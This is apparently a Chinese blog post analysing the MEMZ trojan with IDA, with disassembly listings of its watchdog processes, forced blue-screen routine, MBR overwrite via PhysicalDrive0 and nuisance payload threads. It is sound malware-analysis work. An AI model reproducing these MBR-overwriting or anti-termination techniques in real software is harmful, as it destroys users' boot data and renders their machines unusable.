2022-01-05病毒分析00
请注意,本文编写于 328 天前,最后修改于 204 天前,其中某些信息可能已经过时。

目录


环境

系统:Windows 7 Service Pack 1
分析工具: IDA x32

一、简要分析

运行病毒样本后会弹出两个警告弹窗,告知用户运行病毒的风险,点击确定后开始运行病毒。

点击完确定后弹出notepad

并且系统开始抽风,打开任务管理器可以看到有6个病毒程序的进程

同时自动弹出浏览器,鼠标晃动,窗口变色及播放各种警告音

如果结束病毒程序进程或者重启,就会触发大量弹窗,并蓝屏,接着再次运行系统就会无限循环播放彩虹猫动画。


以上就是整个病毒运行过程了。

二、详细分析(静态)

第一部分 start

程序会调用GetSystemMetrics函数分别获取屏幕的宽度及高度,还有命令行参数,由于是刚开始运行没有参数,所以会调转到loc_40144F

loc_40144F会有两个弹窗告知用户运行病毒的风险,并判断用户是否点击确定,如果两个弹窗都点了确定,就会调用LocalAlloc从堆中分配指定大小的字节数,接着获取当前进程已加载模块的文件的完整路径,然后循环6次调用ShellExecuteW,其中5次参数为/watchdog, 1次参数为/main的MEMZ进程,所以我们在简要分析任务管理器中看到的6个病毒进程就是这么来的。再接着会调用SetPriorityClass/main进程优先级调到最高。

asm
.text:0040144F loc_40144F:                             ; CODE XREF: start+37↑j
.text:0040144F                 mov     esi, ds:MessageBoxA
.text:00401455                 mov     edi, offset Caption ; "MEMZ"
.text:0040145A                 push    34h ; '4'       ; uType
.text:0040145C                 push    edi             ; lpCaption
.text:0040145D                 push    offset Text     ; "The software you just executed is consi"...
.text:00401462                 push    ebx             ; hWnd
.text:00401463                 call    esi ; MessageBoxA
.text:00401465                 cmp     eax, 6
.text:00401468                 jnz     loc_4014F6
.text:0040146E                 push    34h ; '4'       ; uType
.text:00401470                 push    edi             ; lpCaption
.text:00401471                 push    offset aThisIsTheLastW ; "THIS IS THE LAST WARNING!\r\n\r\nTHE CR"...
.text:00401476                 push    ebx             ; hWnd
.text:00401477                 call    esi ; MessageBoxA
.text:00401479                 cmp     eax, 6
.text:0040147C                 jnz     short loc_4014F6
.text:0040147E                 push    4000h           ; uBytes
.text:00401483                 push    40h ; '@'       ; uFlags
.text:00401485                 call    ds:LocalAlloc   ; 从堆中分配指定大小的字节数
.text:0040148B                 push    2000h           ; nSize
.text:00401490                 mov     esi, eax
.text:00401492                 push    esi             ; lpFilename
.text:00401493                 push    ebx             ; hModule
.text:00401494                 call    ds:GetModuleFileNameW ; 获取当前进程已加载模块的文件的完整路径
.text:0040149A                 push    5
.text:0040149C                 pop     edi
.text:0040149D
.text:0040149D loc_40149D:                             ; CODE XREF: start+284↓j
.text:0040149D                 push    0Ah             ; nShowCmd
.text:0040149F                 push    ebx             ; lpDirectory
.text:004014A0                 push    offset String2  ; "/watchdog"
.text:004014A5                 push    esi             ; lpFile
.text:004014A6                 push    ebx             ; lpOperation
.text:004014A7                 push    ebx             ; hwnd
.text:004014A8                 call    ds:ShellExecuteW
.text:004014AE                 sub     edi, 1
.text:004014B1                 jnz     short loc_40149D ; 循环执行5次watchdog
.text:004014B3                 lea     eax, [ebp+pExecInfo]
.text:004014B6                 mov     [ebp+pExecInfo.cbSize], 3Ch ; '<'
.text:004014BD                 push    eax             ; pExecInfo
.text:004014BE                 mov     [ebp+pExecInfo.lpFile], esi
.text:004014C1                 mov     [ebp+pExecInfo.lpParameters], offset aMain ; "/main"
.text:004014C8                 mov     [ebp+pExecInfo.fMask], 40h ; '@'
.text:004014CF                 mov     [ebp+pExecInfo.hwnd], ebx
.text:004014D2                 mov     [ebp+pExecInfo.lpVerb], ebx
.text:004014D5                 mov     [ebp+pExecInfo.lpDirectory], ebx
.text:004014D8                 mov     [ebp+pExecInfo.hInstApp], ebx
.text:004014DB                 mov     [ebp+pExecInfo.nShow], 0Ah
.text:004014E2                 call    ds:ShellExecuteExW ; 执行1次/main
.text:004014E8                 push    80h ; '€'       ; dwPriorityClass
.text:004014ED                 push    [ebp+pExecInfo.hProcess] ; hProcess
.text:004014F0                 call    ds:SetPriorityClass ; 提高/main优先级
.text:004014F6
.text:004014F6 loc_4014F6:                             ; CODE XREF: start+23B↑j
.text:004014F6                                         ; start+24F↑j
.text:004014F6                 push    ebx
.text:004014F7                 jmp     loc_40132B

最后调用ExitProcess退出进程。

第二部分 /watchdog

经过上面start部分之后,程序首先会判断否为/watchdog为参数的MEMZ进程,如果是就创建线程执行sub_40114A,然后调用RegisterClassEx注册窗口和CreateWindowEx新建窗口并消息循环

asm
.text:0040126A                 push    offset String2  ; "/watchdog"
.text:0040126F                 push    dword ptr [eax+4] ; lpString1
.text:00401272                 call    ds:lstrcmpW
.text:00401278                 test    eax, eax
.text:0040127A                 jnz     loc_401308
.text:00401280                 push    ebx             ; lpThreadId
.text:00401281                 push    ebx             ; dwCreationFlags
.text:00401282                 push    ebx             ; lpParameter
.text:00401283                 push    offset sub_40114A ; lpStartAddress
.text:00401288                 push    ebx             ; dwStackSize
.text:00401289                 push    ebx             ; lpThreadAttributes
.text:0040128A                 call    ds:CreateThread ; 创建线程
.text:00401290                 lea     eax, [ebp+pExecInfo.lpVerb]
.text:00401293                 mov     [ebp+pExecInfo.lpVerb], 30h ; '0'
.text:0040129A                 mov     esi, offset ClassName ; "hax"
.text:0040129F                 mov     [ebp+pExecInfo.lpParameters], offset sub_401000    ;如果用户尝试重启或关机,会触发
.text:004012A6                 push    eax             ; WNDCLASSEXA *
.text:004012A7                 mov     dword ptr [ebp+pExecInfo.anonymous_0], esi
.text:004012AA                 mov     [ebp+pExecInfo.lpFile], ebx
.text:004012AD                 mov     [ebp+pExecInfo.lpDirectory], ebx
.text:004012B0                 mov     [ebp+pExecInfo.nShow], ebx
.text:004012B3                 mov     [ebp+pExecInfo.hInstApp], ebx
.text:004012B6                 mov     [ebp+pExecInfo.lpIDList], ebx
.text:004012B9                 mov     [ebp+pExecInfo.lpClass], ebx
.text:004012BC                 mov     [ebp+pExecInfo.hkeyClass], ebx
.text:004012BF                 mov     [ebp+pExecInfo.dwHotKey], ebx
.text:004012C2                 mov     [ebp+pExecInfo.hProcess], ebx
.text:004012C5                 call    ds:RegisterClassExA ; 注册窗口
.text:004012CB                 push    ebx             ; lpParam
.text:004012CC                 push    ebx             ; hInstance
.text:004012CD                 push    ebx             ; hMenu
.text:004012CE                 push    ebx             ; hWndParent
.text:004012CF                 push    64h ; 'd'       ; nHeight
.text:004012D1                 push    64h ; 'd'       ; nWidth
.text:004012D3                 push    ebx             ; Y
.text:004012D4                 push    ebx             ; X
.text:004012D5                 push    ebx             ; dwStyle
.text:004012D6                 push    ebx             ; lpWindowName
.text:004012D7                 push    esi             ; lpClassName
.text:004012D8                 push    ebx             ; dwExStyle
.text:004012D9                 call    ds:CreateWindowExA ; 创建窗口
.text:004012DF                 mov     esi, ds:GetMessageW ; 消息循环
.text:004012E5                 jmp     short loc_4012FB
.text:004012E7 ; ---------------------------------------------------------------------------
.text:004012E7
.text:004012E7 loc_4012E7:                             ; CODE XREF: start+D9↓j
.text:004012E7                 lea     eax, [ebp+Msg]
.text:004012EA                 push    eax             ; lpMsg
.text:004012EB                 call    ds:TranslateMessage
.text:004012F1                 lea     eax, [ebp+Msg]
.text:004012F4                 push    eax             ; lpMsg
.text:004012F5                 call    ds:DispatchMessageW
.text:004012FB
.text:004012FB loc_4012FB:                             ; CODE XREF: start+B8↑j
.text:004012FB                 push    ebx             ; wMsgFilterMax
.text:004012FC                 push    ebx             ; wMsgFilterMin
.text:004012FD                 push    ebx             ; hWnd
.text:004012FE                 lea     eax, [ebp+Msg]
.text:00401301                 push    eax             ; lpMsg
.text:00401302                 call    esi ; GetMessageW
.text:00401304                 test    eax, eax
.text:00401306                 jg      short loc_4012E7

start时创建了5个/watchdog为参数的MEMZ进程,所以线程也对应了5个

sub_40114A 监测进程及是否主动关机

首先会调用LocalAlloc从堆中分配指定大小的字节数,用于存储路径,然后调用GetCurrentProcess当前进程句柄,再调用GetProcessImageFileNameA获取当前进程路径,

接着一个死循环,CreateToolhelp32Snapshot拍摄进程快照,通过Process32FirstWProcess32NextW遍历进程,再通过一个内循环记录病毒进程数量,esi存放当前遍历到的MEMZ进程数量,var_C存放上一次遍历到的MEMZ的进程的数量,如果esi小于var_C就说明,病毒进程被关闭,调用函数sub_401021,这个函数中会先创建20个线程,弹出大量随机内容随机位置的弹窗后,蓝屏,关机。

asm
.text:0040114A sub_40114A      proc near               ; DATA XREF: start+56↓o
.text:0040114A
.text:0040114A pe              = PROCESSENTRY32W ptr -23Ch
.text:0040114A lpString1       = dword ptr -10h
.text:0040114A var_C           = dword ptr -0Ch
.text:0040114A lpString2       = dword ptr -8
.text:0040114A hObject         = dword ptr -4
.text:0040114A lpThreadParameter= dword ptr  8
.text:0040114A
.text:0040114A                 push    ebp
.text:0040114B                 mov     ebp, esp
.text:0040114D                 sub     esp, 23Ch
.text:00401153                 push    ebx
.text:00401154                 push    esi
.text:00401155                 xor     ebx, ebx
.text:00401157                 push    edi
.text:00401158                 mov     [ebp+var_C], ebx
.text:0040115B                 mov     ebx, 200h
.text:00401160                 push    ebx             ; uBytes
.text:00401161                 push    40h ; '@'       ; uFlags
.text:00401163                 call    ds:LocalAlloc   ; 从堆中分配指定大小的字节数,用于存储路径
.text:00401169                 push    ebx
.text:0040116A                 push    eax
.text:0040116B                 mov     [ebp+lpString1], eax
.text:0040116E                 call    ds:GetCurrentProcess ; 获取当前进程句柄
.text:00401174                 push    eax
.text:00401175                 call    GetProcessImageFileNameA ; 获取进程路径
.text:0040117A                 push    3E8h            ; dwMilliseconds
.text:0040117F

               ;外循环
.text:0040117F while_Begin:                            ; CODE XREF: sub_40114A+DE↓j
.text:0040117F                 call    ds:Sleep        ; sleep1秒
.text:00401185                 push    0               ; th32ProcessID
.text:00401187                 push    2               ; dwFlags
.text:00401189                 call    CreateToolhelp32Snapshot
.text:0040118E                 mov     edi, eax
.text:00401190                 mov     [ebp+pe.dwSize], 22Ch
.text:0040119A                 lea     eax, [ebp+pe]
.text:004011A0                 push    eax             ; lppe
.text:004011A1                 push    edi             ; hSnapshot
.text:004011A2                 call    Process32FirstW
.text:004011A7                 mov     ebx, [ebp+lpString1]
.text:004011AA                 xor     esi, esi
.text:004011AC
               ;内循环,用于统计病毒进程数量
.text:004011AC _dowhile_Begin:                         ; CODE XREF: sub_40114A+C6↓j
.text:004011AC                 push    [ebp+pe.th32ProcessID] ; dwProcessId
.text:004011B2                 push    0               ; bInheritHandle
.text:004011B4                 push    400h            ; dwDesiredAccess
.text:004011B9                 call    ds:OpenProcess
.text:004011BF                 push    200h            ; uBytes
.text:004011C4                 push    40h ; '@'       ; uFlags
.text:004011C6                 mov     [ebp+hObject], eax
.text:004011C9                 call    ds:LocalAlloc
.text:004011CF                 push    200h
.text:004011D4                 push    eax
.text:004011D5                 push    [ebp+hObject]
.text:004011D8                 mov     [ebp+lpString2], eax
.text:004011DB                 call    GetProcessImageFileNameA
.text:004011E0                 push    [ebp+lpString2] ; lpString2
.text:004011E3                 push    ebx             ; lpString1
.text:004011E4                 call    ds:lstrcmpA
.text:004011EA                 test    eax, eax
.text:004011EC                 jnz     short loc_4011EF
.text:004011EE                 inc     esi            ;统计进程数量
.text:004011EF
.text:004011EF loc_4011EF:                             ; CODE XREF: sub_40114A+A2↑j
.text:004011EF                 push    [ebp+hObject]   ; hObject
.text:004011F2                 call    ds:CloseHandle
.text:004011F8                 push    [ebp+lpString2] ; hMem
.text:004011FB                 call    ds:LocalFree
.text:00401201                 lea     eax, [ebp+pe]
.text:00401207                 push    eax             ; lppe
.text:00401208                 push    edi             ; hSnapshot
.text:00401209                 call    Process32NextW
.text:0040120E                 test    eax, eax
.text:00401210                 jnz     short _dowhile_Begin
.text:00401212                 push    edi             ; hObject
.text:00401213                 call    ds:CloseHandle
.text:00401219                 cmp     esi, [ebp+var_C]    ; 比较进程数量
.text:0040121C                 jge     short loc_401223    ; esi < var_C 时运行函数sub_401021
.text:0040121E                 call    sub_401021
.text:00401223
.text:00401223 loc_401223:                             ; CODE XREF: sub_40114A+D2↑j
.text:00401223                 mov     [ebp+var_C], esi    ;保存上一次遍历进程数
.text:00401226                 push    0Ah
.text:00401228                 jmp     while_Begin     ; sleep1秒
.text:00401228 sub_40114A      endp

sub_401021 蓝屏关机

进到函数后,直接创建了20个线程,间隔0.1秒。StartAddress为函数指针

接着RtlAdjustPrivilege提权后NtRaiseHardError制造系统蓝屏

然后通过OpenProcessToken获取进程tokenAdjustTokenPrivilege获得访问token的特权后使用ExitWindowsEx注销系统。

StartAddress
首先会下钩子,回调函数为fn,使用sub_401A55获取随机数,并有26条消息保存在lpText所指向的地址中,随机数对0x1A取余,结果存放在edx寄存器,实现在26条消息中随机选取一条MessageBoxA弹出显示。
、

lpText

sub_401A55
随机数函数

sub_401000 主动关机或重启

回调函数,如果用户主动关机或重启就会调用上面的蓝屏关机函数

如果参数带有/watchdog,创建线程判断是否有当前病毒程序进程是否被结束,如果数量不对,就调用蓝屏关机函数,如果尝试关机或重启,依然会调用蓝屏关机函数。

第三部分 /main

/main 部分刚开始就会调用CreateFileA以读写权限打开\\\\.\\PhysicalDrive0主硬盘,并且覆盖系统原来的MBR,改成自己的恶意代码,也就是我们运行完病毒,重启时会出现的魔性的彩虹猫动画的来源了。

asm
.text:00401308 loc_401308:                             ; CODE XREF: start+4D↑j
.text:00401308                 push    ebx             ; hTemplateFile
.text:00401309                 push    ebx             ; dwFlagsAndAttributes
.text:0040130A                 push    3               ; dwCreationDisposition
.text:0040130C                 push    ebx             ; lpSecurityAttributes
.text:0040130D                 push    3               ; dwShareMode
.text:0040130F                 push    0C0000000h      ; dwDesiredAccess
.text:00401314                 push    offset FileName ; "\\\\.\\PhysicalDrive0"
.text:00401319                 call    ds:CreateFileA
.text:0040131F                 mov     ebx, eax
.text:00401321                 mov     [ebp+hObject], ebx
.text:00401324                 cmp     ebx, 0FFFFFFFFh
.text:00401327                 jnz     short loc_401331
.text:00401329                 push    2               ; uExitCode
.text:0040132B
.text:0040132B loc_40132B:                             ; CODE XREF: start+170↓j
.text:0040132B                                         ; start+1A3↓j ...
.text:0040132B                 call    ds:ExitProcess
.text:00401331 ; ---------------------------------------------------------------------------
.text:00401331
.text:00401331 loc_401331:                             ; CODE XREF: start+FA↑j
.text:00401331                 push    10000h          ; uBytes
.text:00401336                 push    40h ; '@'       ; uFlags
.text:00401338                 call    ds:LocalAlloc
.text:0040133E                 xor     edi, edi
.text:00401340                 mov     esi, eax
.text:00401342                 cmp     ds:dword_4029E8, edi
.text:00401348                 jbe     short loc_401362
.text:0040134A                 mov     edx, offset byte_402118
.text:0040134F                 mov     ecx, esi
.text:00401351                 sub     edx, esi
.text:00401353
.text:00401353 loc_401353:                             ; CODE XREF: start+133↓j
.text:00401353                 mov     al, [edx+ecx]
.text:00401356                 inc     edi
.text:00401357                 mov     [ecx], al
.text:00401359                 inc     ecx
.text:0040135A                 cmp     edi, ds:dword_4029E8
.text:00401360                 jb      short loc_401353
.text:00401362
.text:00401362 loc_401362:                             ; CODE XREF: start+11B↑j
.text:00401362                 xor     ecx, ecx
.text:00401364                 cmp     ds:dword_4029EC, ecx
.text:0040136A                 jbe     short loc_401382
.text:0040136C
.text:0040136C loc_40136C:                             ; CODE XREF: start+153↓j
.text:0040136C                 mov     al, ds:byte_402248[ecx]
.text:00401372                 mov     [esi+ecx+1FEh], al
.text:00401379                 inc     ecx
.text:0040137A                 cmp     ecx, ds:dword_4029EC
.text:00401380                 jb      short loc_40136C
.text:00401382
.text:00401382 loc_401382:                             ; CODE XREF: start+13D↑j
.text:00401382                 push    0               ; lpOverlapped
.text:00401384                 lea     eax, [ebp+NumberOfBytesWritten]
.text:00401387                 push    eax             ; lpNumberOfBytesWritten
.text:00401388                 push    10000h          ; nNumberOfBytesToWrite
.text:0040138D                 push    esi             ; lpBuffer
.text:0040138E                 push    ebx             ; hFile
.text:0040138F                 mov     ebx, ds:WriteFile
.text:00401395                 call    ebx ; WriteFile
.text:00401397                 test    eax, eax
.text:00401399                 jnz     short loc_40139F
.text:0040139B                 push    3
.text:0040139D                 jmp     short loc_40132B
.text:0040139F ; ---------------------------------------------------------------------------
.text:0040139F
.text:0040139F loc_40139F:                             ; CODE XREF: start+16C↑j
.text:0040139F                 push    [ebp+hObject]   ; hObject
.text:004013A2                 mov     edi, ds:CloseHandle
.text:004013A8                 call    edi ; CloseHandle

覆盖完MBR之后,会创建\\note.txt,并写入文字提示后,用notepad.exe打开note.txt文件。

asm
.text:004013AA                 push    0               ; hTemplateFile
.text:004013AC                 push    80h ; '€'       ; dwFlagsAndAttributes
.text:004013B1                 push    2               ; dwCreationDisposition
.text:004013B3                 push    0               ; lpSecurityAttributes
.text:004013B5                 push    3               ; dwShareMode
.text:004013B7                 push    0C0000000h      ; dwDesiredAccess
.text:004013BC                 push    offset Parameters ; "\\note.txt"
.text:004013C1                 call    ds:CreateFileA
.text:004013C7                 mov     esi, eax
.text:004013C9                 cmp     esi, 0FFFFFFFFh
.text:004013CC                 jnz     short loc_4013D5
.text:004013CE                 push    4
.text:004013D0                 jmp     loc_40132B
.text:004013D5 ; ---------------------------------------------------------------------------
.text:004013D5
.text:004013D5 loc_4013D5:                             ; CODE XREF: start+19F↑j
.text:004013D5                 push    0               ; lpOverlapped
.text:004013D7                 lea     eax, [ebp+NumberOfBytesWritten]
.text:004013DA                 push    eax             ; lpNumberOfBytesWritten
.text:004013DB                 push    ds:nNumberOfBytesToWrite ; nNumberOfBytesToWrite
.text:004013E1                 push    offset aYourComputerHa ; "YOUR COMPUTER HAS BEEN FUCKED BY THE ME"...
.text:004013E6                 push    esi             ; hFile
.text:004013E7                 call    ebx ; WriteFile
.text:004013E9                 test    eax, eax
.text:004013EB                 jnz     short loc_4013F4
.text:004013ED                 push    5
.text:004013EF                 jmp     loc_40132B
.text:004013F4 ; ---------------------------------------------------------------------------
.text:004013F4
.text:004013F4 loc_4013F4:                             ; CODE XREF: start+1BE↑j
.text:004013F4                 push    esi             ; hObject
.text:004013F5                 call    edi ; CloseHandle
.text:004013F7                 push    0Ah             ; nShowCmd
.text:004013F9                 xor     ebx, ebx
.text:004013FB                 push    ebx             ; lpDirectory
.text:004013FC                 push    offset Parameters ; "\\note.txt"
.text:00401401                 push    offset File     ; "notepad"
.text:00401406                 push    ebx             ; lpOperation
.text:00401407                 push    ebx             ; hwnd
.text:00401408                 call    ds:ShellExecuteA

接着调用CreateThread创建线程,创建10个线程,从off_405130,依次调用10个函数。

线程1:

随机运行 浏览器,计算器,记事本,cmd,任务管理器,注册表管理器等等。

asm
.data:00405000                                         ; DATA XREF: sub_4014FC+18↑r
.data:00405000                                         ; "http://google.co.ck/search?q=best+way+t"...
.data:00405004                 dd offset aHttpGoogleCoCk_0 ; "http://google.co.ck/search?q=how+2+remo"...
.data:00405008                 dd offset aHttpGoogleCoCk_1 ; "http://google.co.ck/search?q=mcafee+vs+"...
.data:0040500C                 dd offset aHttpGoogleCoCk_2 ; "http://google.co.ck/search?q=how+to+sen"...
.data:00405010                 dd offset aHttpGoogleCoCk_3 ; "http://google.co.ck/search?q=minecraft+"...
.data:00405014                 dd offset aHttpGoogleCoCk_4 ; "http://google.co.ck/search?q=how+to+get"...
.data:00405018                 dd offset aHttpGoogleCoCk_5 ; "http://google.co.ck/search?q=bonzi+budd"...
.data:0040501C                 dd offset aHttpGoogleCoCk_6 ; "http://google.co.ck/search?q=how+2+buy+"...
.data:00405020                 dd offset aHttpGoogleCoCk_7 ; "http://google.co.ck/search?q=how+to+cod"...
.data:00405024                 dd offset aHttpGoogleCoCk_8 ; "http://google.co.ck/search?q=what+happe"...
.data:00405028                 dd offset aHttpGoogleCoCk_9 ; "http://google.co.ck/search?q=g3t+r3kt"
.data:0040502C                 dd offset aHttpGoogleCoCk_10 ; "http://google.co.ck/search?q=batch+viru"...
.data:00405030                 dd offset aHttpGoogleCoCk_11 ; "http://google.co.ck/search?q=virus.exe"
.data:00405034                 dd offset aHttpGoogleCoCk_12 ; "http://google.co.ck/search?q=internet+e"...
.data:00405038                 dd offset aHttpGoogleCoCk_13 ; "http://google.co.ck/search?q=facebook+h"...
.data:0040503C                 dd offset aHttpGoogleCoCk_14 ; "http://google.co.ck/search?q=virus+buil"...
.data:00405040                 dd offset aHttpGoogleCoCk_15 ; "http://google.co.ck/search?q=how+to+cre"...
.data:00405044                 dd offset aHttpGoogleCoCk_16 ; "http://google.co.ck/search?q=how+to+rem"...
.data:00405048                 dd offset aHttpGoogleCoCk_17 ; "http://google.co.ck/search?q=my+compute"...
.data:0040504C                 dd offset aHttpGoogleCoCk_18 ; "http://google.co.ck/search?q=dank+memz"
.data:00405050                 dd offset aHttpGoogleCoCk_19 ; "http://google.co.ck/search?q=how+to+dow"...
.data:00405054                 dd offset aHttpGoogleCoCk_20 ; "http://google.co.ck/search?q=half+life+"...
.data:00405058                 dd offset aHttpGoogleCoCk_21 ; "http://google.co.ck/search?q=is+illumin"...
.data:0040505C                 dd offset aHttpGoogleCoCk_22 ; "http://google.co.ck/search?q=montage+pa"...
.data:00405060                 dd offset aHttpGoogleCoCk_23 ; "http://google.co.ck/search?q=the+memz+a"...
.data:00405064                 dd offset aHttpGoogleCoCk_24 ; "http://google.co.ck/search?q=stanky+dan"...
.data:00405068                 dd offset aHttpGoogleCoCk_25 ; "http://google.co.ck/search?q=john+cena+"...
.data:0040506C                 dd offset aHttpGoogleCoCk_26 ; "http://google.co.ck/search?q=vinesauce+"...
.data:00405070                 dd offset aHttpGoogleCoCk_27 ; "http://google.co.ck/search?q=skrillex+s"...
.data:00405074                 dd offset aHttpAnswersMic ; "http://answers.microsoft.com/en-us/prot"...
.data:00405078                 dd offset aHttpMotherboar ; "http://motherboard.vice.com/read/watch-"...
.data:0040507C                 dd offset aHttpPlayClubpe ; "http://play.clubpenguin.com"
.data:00405080                 dd offset aHttpPcoptimize ; "http://pcoptimizerpro.com"
.data:00405084                 dd offset aHttpSoftonicCo ; "http://softonic.com"
.data:00405088                 dd offset aCalc         ; "calc"
.data:0040508C                 dd offset File          ; "notepad"
.data:00405090                 dd offset aCmd          ; "cmd"
.data:00405094                 dd offset aWrite        ; "write"
.data:00405098                 dd offset aRegedit      ; "regedit"
.data:0040509C                 dd offset aExplorer     ; "explorer"
.data:004050A0                 dd offset aTaskmgr      ; "taskmgr"
.data:004050A4                 dd offset aMsconfig     ; "msconfig"
.data:004050A8                 dd offset aMspaint      ; "mspaint"
.data:004050AC                 dd offset aDevmgmtMsc   ; "devmgmt.msc"
.data:004050B0                 dd offset aControl      ; "control"
.data:004050B4                 dd offset aMmc          ; "mmc"

线程2:
线程2,随机设置鼠标位置

asm
.text:0040156D                 push    ebp
.text:0040156E                 mov     ebp, esp
.text:00401570                 push    ecx
.text:00401571                 push    ecx
.text:00401572                 push    ebx
.text:00401573                 push    esi
.text:00401574                 push    edi
.text:00401575                 lea     eax, [ebp+Point]
.text:00401578                 push    eax             ; lpPoint
.text:00401579                 call    ds:GetCursorPos
.text:0040157F                 mov     eax, [ebp+arg_4]
.text:00401582                 mov     ecx, 898h
.text:00401587                 cdq
.text:00401588                 idiv    ecx
.text:0040158A                 lea     esi, [eax+2]
.text:0040158D                 call    sub_401A55
.text:00401592                 cdq
.text:00401593                 idiv    esi
.text:00401595                 mov     edi, edx
.text:00401597                 call    sub_401A55
.text:0040159C                 cdq
.text:0040159D                 idiv    esi
.text:0040159F                 mov     esi, edx
.text:004015A1                 call    sub_401A55
.text:004015A6                 push    3
.text:004015A8                 cdq
.text:004015A9                 pop     ebx
.text:004015AA                 idiv    ebx
.text:004015AC                 dec     edx
.text:004015AD                 imul    edx, edi
.text:004015B0                 add     edx, [ebp+Point.y]
.text:004015B3                 push    edx             ; Y
.text:004015B4                 call    sub_401A55
.text:004015B9                 cdq
.text:004015BA                 idiv    ebx
.text:004015BC                 dec     edx
.text:004015BD                 imul    edx, esi
.text:004015C0                 add     edx, [ebp+Point.x]
.text:004015C3                 push    edx             ; X
.text:004015C4                 call    ds:SetCursorPos
.text:004015CA                 push    2
.text:004015CC                 pop     eax
.text:004015CD                 pop     edi
.text:004015CE                 pop     esi
.text:004015CF                 pop     ebx
.text:004015D0                 mov     esp, ebp
.text:004015D2                 pop     ebp
.text:004015D3                 retn
.text:004015D3 sub_40156D      endp

线程3:
控制键盘,模拟键盘事件

asm
.text:004017A5 pInputs         = tagINPUT ptr -1Ch
.text:004017A5
.text:004017A5                 push    ebp
.text:004017A6                 mov     ebp, esp
.text:004017A8                 sub     esp, 1Ch
.text:004017AB                 mov     [ebp+pInputs.type], 1
.text:004017B2                 call    sub_401A55
.text:004017B7                 push    2Ah ; '*'
.text:004017B9                 pop     ecx
.text:004017BA                 cdq
.text:004017BB                 idiv    ecx
.text:004017BD                 push    1Ch             ; cbSize
.text:004017BF                 lea     eax, [ebp+pInputs]
.text:004017C2                 add     edx, 30h ; '0'
.text:004017C5                 push    eax             ; pInputs
.text:004017C6                 push    1               ; cInputs
.text:004017C8                 mov     word ptr [ebp+pInputs.anonymous_0], dx
.text:004017CC                 call    ds:SendInput
.text:004017D2                 call    sub_401A55
.text:004017D7                 cdq
.text:004017D8                 mov     ecx, 190h
.text:004017DD                 idiv    ecx
.text:004017DF                 lea     eax, [edx+12Ch]
.text:004017E5                 mov     esp, ebp
.text:004017E7                 pop     ebp
.text:004017E8                 retn
.text:004017E8 sub_4017A5      endp

线程4:
播放声音

asm
.text:004016A0 sub_4016A0      proc near               ; DATA XREF: .data:00405148↓o
.text:004016A0                 push    1               ; fdwSound
.text:004016A2                 push    0               ; hmod
.text:004016A4                 call    sub_401A55
.text:004016A9                 xor     edx, edx
.text:004016AB                 div     ds:dword_402114
.text:004016B1                 push    pszSound[edx*4] ; pszSound
.text:004016B8                 call    ds:PlaySoundA
.text:004016BE                 call    sub_401A55
.text:004016C3                 push    14h
.text:004016C5                 cdq
.text:004016C6                 pop     ecx
.text:004016C7                 idiv    ecx
.text:004016C9                 lea     eax, [ecx+edx]
.text:004016CC                 retn
.text:004016CC sub_4016A0      endp

线程5:
获取窗口相关信息,不知道干什么

asm
.text:004015D4                 push    ebp
.text:004015D5                 mov     ebp, esp
.text:004015D7                 sub     esp, 10h
.text:004015DA                 push    esi
.text:004015DB                 push    edi
.text:004015DC                 call    ds:GetDesktopWindow
.text:004015E2                 mov     edi, eax
.text:004015E4                 push    edi             ; hWnd
.text:004015E5                 call    ds:GetWindowDC
.text:004015EB                 mov     esi, eax
.text:004015ED                 lea     eax, [ebp+Rect]
.text:004015F0                 push    eax             ; lpRect
.text:004015F1                 push    edi             ; hWnd
.text:004015F2                 call    ds:GetWindowRect
.text:004015F8                 mov     eax, [ebp+Rect.bottom]
.text:004015FB                 xor     ecx, ecx
.text:004015FD                 sub     eax, [ebp+Rect.top]
.text:00401600                 push    330008h         ; rop
.text:00401605                 push    ecx             ; y1
.text:00401606                 push    ecx             ; x1
.text:00401607                 push    esi             ; hdcSrc
.text:00401608                 push    eax             ; cy
.text:00401609                 mov     eax, [ebp+Rect.right]
.text:0040160C                 sub     eax, [ebp+Rect.left]
.text:0040160F                 push    eax             ; cx
.text:00401610                 push    ecx             ; y
.text:00401611                 push    ecx             ; x
.text:00401612                 push    esi             ; hdc
.text:00401613                 call    ds:BitBlt
.text:00401619                 push    esi             ; hDC
.text:0040161A                 push    edi             ; hWnd
.text:0040161B                 call    ds:ReleaseDC
.text:00401621                 push    64h ; 'd'
.text:00401623                 pop     eax
.text:00401624                 pop     edi
.text:00401625                 pop     esi
.text:00401626                 mov     esp, ebp
.text:00401628                 pop     ebp
.text:00401629                 retn
.text:00401629 sub_4015D4      endp
.text:00401629

线程6:
创建线程,弹MessageBox

asm
.text:0040162A
.text:0040162A                 push    ebp
.text:0040162B                 mov     ebp, esp
.text:0040162D                 push    ecx
.text:0040162E                 push    ecx
.text:0040162F                 xor     eax, eax
.text:00401631                 push    eax             ; lpThreadId
.text:00401632                 push    eax             ; dwCreationFlags
.text:00401633                 push    eax             ; lpParameter
.text:00401634                 push    offset sub_401994 ; lpStartAddress
.text:00401639                 push    1000h           ; dwStackSize
.text:0040163E                 push    eax             ; lpThreadAttributes
.text:0040163F                 call    ds:CreateThread
.text:00401645                 call    sub_401A55
.text:0040164A                 push    1Eh
.text:0040164C                 cdq
.text:0040164D                 pop     ecx
.text:0040164E                 idiv    ecx
.text:00401650                 mov     [ebp+var_4], edx
.text:00401653                 fild    [ebp+var_4]
.text:00401656                 fstp    qword ptr [ebp-8]
.text:00401659                 fld     qword ptr [ebp-8]
.text:0040165C                 fild    [ebp+arg_0]
.text:0040165F                 fstp    qword ptr [ebp-8]
.text:00401662                 fld     qword ptr [ebp-8]
.text:00401665                 fmul    ds:dbl_403A28
.text:0040166B                 fadd    ds:dbl_403A30
.text:00401671                 fdivr   ds:dbl_403A88
.text:00401677                 fadd    ds:dbl_403A60
.text:0040167D                 faddp   st(1), st
.text:0040167F                 call    sub_401B09
.text:00401684                 mov     esp, ebp
.text:00401686                 pop     ebp
.text:00401687                 retn
.text:00401687 sub_40162A      endp
asm
.text:00401994                 push    esi
.text:00401995                 call    ds:GetCurrentThreadId
.text:0040199B                 push    eax             ; dwThreadId
.text:0040199C                 push    0               ; hmod
.text:0040199E                 push    offset fn       ; lpfn
.text:004019A3                 push    5               ; idHook
.text:004019A5                 call    ds:SetWindowsHookExW
.text:004019AB                 push    1030h           ; uType
.text:004019B0                 push    offset aLol     ; "lol"
.text:004019B5                 push    offset aStillUsingThis ; "Still using this computer?"
.text:004019BA                 push    0               ; hWnd
.text:004019BC                 mov     esi, eax
.text:004019BE                 call    ds:MessageBoxW
.text:004019C4                 push    esi             ; hhk
.text:004019C5                 call    ds:UnhookWindowsHookEx
